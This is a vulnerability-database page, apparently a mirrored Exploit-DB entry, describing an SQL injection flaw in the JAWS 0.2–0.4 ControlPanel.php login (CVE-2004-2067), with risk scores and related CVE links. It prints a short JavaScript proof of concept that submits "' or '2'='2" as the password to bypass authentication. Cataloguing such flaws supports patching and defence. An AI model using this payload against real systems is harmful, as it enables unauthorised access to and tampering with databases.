Lucene search
+L

Jaws 0.2/0.3/0.4 - 'ControlPanel.php' SQL Injection

🗓️ 29 Jul 2004 00:00:00Reported by Fernando QuinteroType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

SQL injection vulnerability in JAWS ControlPanel.php allows database manipulation and information compromise.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-2067
10 May 200504:00
cve
cvelist
Cvelist
CVE-2004-2067
10 May 200504:00
cvelist
euvd
EUVD
EUVD-2004-2059
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-2067
29 Jul 200404:00
nvd
source: https://www.securityfocus.com/bid/10826/info

JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database.

<script type="text/javascript">

function crypt_form(form) {
var new_password = calcMD5(form.password.value);
form.crypted_password.value = "' or '2'='2";
form.password.value = "";
return true;
}
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02795
46